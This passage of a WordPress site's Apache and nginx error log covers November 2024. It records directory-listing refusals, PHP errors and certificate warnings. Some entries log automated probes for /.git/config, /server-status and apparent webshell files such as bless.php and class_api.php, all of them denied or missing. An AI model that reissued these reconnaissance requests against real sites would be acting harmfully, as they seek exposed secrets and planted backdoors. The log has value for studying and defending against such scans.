/home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:57.360572 2024] [autoindex:error] [pid 7169:tid 140626792265472] [client 146.70.192.108:42138] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:57.583136 2024] [autoindex:error] [pid 7170:tid 140626657982208] [client 146.70.192.108:42140] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:57.805983 2024] [autoindex:error] [pid 8553:tid 140626666374912] [client 146.70.192.108:42142] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:58.078890 2024] [:error] [pid 7168:tid 140626691553024] [client 146.70.192.108:42144] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Nov 12 18:09:58.079210 2024] [:error] [pid 7168:tid 140626691553024] [client 146.70.192.108:42144] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Nov 12 18:09:58.079378 2024] [:error] [pid 7168:tid 140626691553024] [client 146.70.192.108:42144] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Nov 12 18:09:58.079571 2024] [:error] [pid 7168:tid 140626691553024] [client 146.70.192.108:42144] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Nov 12 18:09:58.307607 2024] [autoindex:error] [pid 8553:tid 140626912999168] [client 146.70.192.108:42146] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:09:58.529993 2024] [autoindex:error] [pid 8553:tid 140626657982208] [client 146.70.192.108:42148] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:00.061612 2024] [autoindex:error] [pid 8553:tid 140626725123840] [client 146.70.192.108:42152] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:00.286140 2024] [autoindex:error] [pid 7169:tid 140626741909248] [client 146.70.192.108:42154] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:02.180496 2024] [autoindex:error] [pid 7169:tid 140626666374912] [client 146.70.192.108:42158] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/lib/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:04.488387 2024] [autoindex:error] [pid 8553:tid 140626767087360] [client 146.70.192.108:42162] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:12.573755 2024] [autoindex:error] [pid 7169:tid 140626708338432] [client 146.70.192.108:42174] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:14.132650 2024] [autoindex:error] [pid 8553:tid 140626775480064] [client 146.70.192.108:42178] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:14.355715 2024] [autoindex:error] [pid 8553:tid 140626716731136] [client 146.70.192.108:42180] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:14.578652 2024] [autoindex:error] [pid 8553:tid 140626792265472] [client 146.70.192.108:42182] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:14.802416 2024] [autoindex:error] [pid 8553:tid 140626683160320] [client 146.70.192.108:42184] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:15.024691 2024] [autoindex:error] [pid 8553:tid 140626674767616] [client 146.70.192.108:42186] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:15.247474 2024] [autoindex:error] [pid 7170:tid 140626708338432] [client 146.70.192.108:42188] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:15.472278 2024] [autoindex:error] [pid 7169:tid 140626758694656] [client 146.70.192.108:42190] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:15.695929 2024] [autoindex:error] [pid 7170:tid 140626912999168] [client 146.70.192.108:42192] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:18.674499 2024] [autoindex:error] [pid 7170:tid 140626683160320] [client 146.70.192.108:42198] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:18.896973 2024] [autoindex:error] [pid 7170:tid 140626758694656] [client 146.70.192.108:42200] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/list-reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:19.119320 2024] [autoindex:error] [pid 7170:tid 140626792265472] [client 146.70.192.108:42202] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:21.935529 2024] [autoindex:error] [pid 7170:tid 140626741909248] [client 146.70.192.108:42208] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Utility/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:23.488552 2024] [autoindex:error] [pid 8553:tid 140626921391872] [client 146.70.192.108:42212] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:25.304802 2024] [autoindex:error] [pid 7169:tid 140626800658176] [client 146.70.192.108:42216] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:25.529073 2024] [autoindex:error] [pid 7169:tid 140626716731136] [client 146.70.192.108:42218] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:27.313346 2024] [autoindex:error] [pid 8553:tid 140626741909248] [client 146.70.192.108:42222] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:27.537078 2024] [autoindex:error] [pid 7170:tid 140626674767616] [client 146.70.192.108:42224] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/freeform/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:33.559442 2024] [autoindex:error] [pid 7168:tid 140626783872768] [client 146.70.192.108:42234] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:38.979316 2024] [autoindex:error] [pid 8553:tid 140626691553024] [client 146.70.192.108:42244] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:10:41.799696 2024] [:error] [pid 7169:tid 140626683160320] [client 146.70.192.108:42250] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/index.php:17 [Tue Nov 12 18:10:41.799794 2024] [:error] [pid 7169:tid 140626683160320] [client 146.70.192.108:42250] Stack trace: [Tue Nov 12 18:10:41.799810 2024] [:error] [pid 7169:tid 140626683160320] [client 146.70.192.108:42250] #0 {main} [Tue Nov 12 18:10:41.799909 2024] [:error] [pid 7169:tid 140626683160320] [client 146.70.192.108:42250] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/index.php on line 17 [Tue Nov 12 18:10:47.107428 2024] [autoindex:error] [pid 7169:tid 140626699945728] [client 146.70.192.108:42262] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:17:42.503608 2024] [authz_core:error] [pid 7170:tid 140626741909248] [client 159.89.12.166:42466] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/12 18:17:48 [error] 7128#7128: *975731 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Nov 13 03:45:44.650790 2024] [ssl:warn] [pid 27803:tid 140218753038208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 13 03:45:44.951271 2024] [ssl:warn] [pid 27804:tid 140218753038208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 13 03:45:45.426057 2024] [ssl:warn] [pid 27804:tid 140218753038208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 13 03:45:47.591644 2024] [ssl:warn] [pid 27804:tid 140218753038208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 13 03:45:49.913142 2024] [ssl:warn] [pid 28226:tid 140662381565824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 13 03:45:50.214525 2024] [ssl:warn] [pid 28227:tid 140662381565824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 13 03:45:51.065678 2024] [ssl:warn] [pid 28227:tid 140662381565824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 13 12:04:39.642574 2024] [autoindex:error] [pid 28661:tid 140662091527936] [client 20.92.249.70:42134] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Nov 14 03:40:52.185927 2024] [ssl:warn] [pid 30970:tid 140190965708672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 14 03:40:52.496484 2024] [ssl:warn] [pid 30971:tid 140190965708672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 14 03:40:53.411518 2024] [ssl:warn] [pid 30971:tid 140190965708672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 14 03:40:55.752965 2024] [ssl:warn] [pid 30971:tid 140190965708672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 14 03:40:58.202320 2024] [ssl:warn] [pid 31387:tid 140237423568768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 14 03:40:58.555671 2024] [ssl:warn] [pid 31388:tid 140237423568768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 14 06:38:43.115537 2024] [authz_core:error] [pid 31985:tid 140236981987072] [client 209.38.248.17:37582] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/14 06:38:48 [error] 31369#31369: *1007448 access forbidden by rule, client: 209.38.248.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Nov 14 07:06:05.146450 2024] [autoindex:error] [pid 31405:tid 140237224036096] [client 20.92.249.70:38040] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Nov 14 14:57:19.973481 2024] [authz_core:error] [pid 31985:tid 140237240821504] [client 139.59.143.102:49608] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/14 14:57:24 [error] 31368#31368: *1013865 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Nov 14 20:38:08.797639 2024] [:error] [pid 31985:tid 140237007165184] [client 15.236.206.62:34438] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Nov 14 20:38:34.588766 2024] [:error] [pid 31403:tid 140237057521408] [client 15.236.206.62:34448] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bless.php [Thu Nov 14 20:38:45.138583 2024] [:error] [pid 31403:tid 140237215643392] [client 15.236.206.62:34450] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Nov 14 20:38:53.873805 2024] [:error] [pid 31403:tid 140237082699520] [client 15.236.206.62:34452] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Fri Nov 15 03:13:43.272643 2024] [ssl:warn] [pid 2822:tid 140271827072896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 15 03:13:43.509622 2024] [ssl:warn] [pid 2823:tid 140271827072896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 15 03:13:43.892768 2024] [ssl:warn] [pid 2823:tid 140271827072896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 15 03:13:46.065799 2024] [ssl:warn] [pid 2823:tid 140271827072896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 15 03:13:48.383590 2024] [ssl:warn] [pid 3239:tid 140356677904256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 15 03:13:48.594587 2024] [ssl:warn] [pid 3240:tid 140356677904256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 15 07:25:07.813168 2024] [autoindex:error] [pid 3259:tid 140356495156992] [client 87.120.113.120:43032] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 15 07:25:11.547009 2024] [autoindex:error] [pid 3259:tid 140356486764288] [client 87.120.113.120:43040] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 15 07:25:18.081951 2024] [autoindex:error] [pid 4586:tid 140356335150848] [client 87.120.113.120:43060] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 15 18:35:42.823870 2024] [autoindex:error] [pid 4586:tid 140356268009216] [client 20.39.184.180:56624] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Nov 16 03:14:40.751940 2024] [ssl:warn] [pid 5385:tid 140286994798464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 16 03:14:40.964685 2024] [ssl:warn] [pid 5386:tid 140286994798464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 16 03:14:41.464873 2024] [ssl:warn] [pid 5386:tid 140286994798464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 16 03:14:43.837570 2024] [ssl:warn] [pid 5386:tid 140286994798464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 16 03:14:46.154388 2024] [ssl:warn] [pid 5807:tid 139968837605248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 16 03:14:46.424879 2024] [ssl:warn] [pid 5808:tid 139968837605248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 16 07:19:44.627854 2024] [authz_core:error] [pid 5828:tid 139968445884160] [client 64.23.218.208:39354] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/16 07:19:48 [error] 5691#5691: *1039740 access forbidden by rule, client: 64.23.218.208, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Nov 16 12:41:52.648673 2024] [autoindex:error] [pid 6059:tid 139968504633088] [client 20.39.184.180:44548] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Nov 16 18:47:18.459093 2024] [authz_core:error] [pid 5827:tid 139968387135232] [client 68.183.9.16:47908] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/16 18:47:23 [error] 5691#5691: *1045059 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Nov 17 03:44:46.254902 2024] [ssl:warn] [pid 2350:tid 140571475867520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 17 03:44:46.574604 2024] [ssl:warn] [pid 2351:tid 140571475867520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 17 03:44:47.189491 2024] [ssl:warn] [pid 2351:tid 140571475867520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 17 03:44:49.395680 2024] [ssl:warn] [pid 2351:tid 140571475867520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 17 03:44:51.761188 2024] [ssl:warn] [pid 2768:tid 140114959701888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 17 03:44:52.055196 2024] [ssl:warn] [pid 2769:tid 140114959701888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 17 21:11:53.368070 2024] [autoindex:error] [pid 2786:tid 140114751776512] [client 20.39.184.180:38974] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Nov 18 03:11:46.010654 2024] [ssl:warn] [pid 29005:tid 139670422427520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 18 03:11:46.245434 2024] [ssl:warn] [pid 29006:tid 139670422427520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 18 03:11:46.867459 2024] [ssl:warn] [pid 29006:tid 139670422427520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 18 03:11:49.767103 2024] [ssl:warn] [pid 29006:tid 139670422427520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 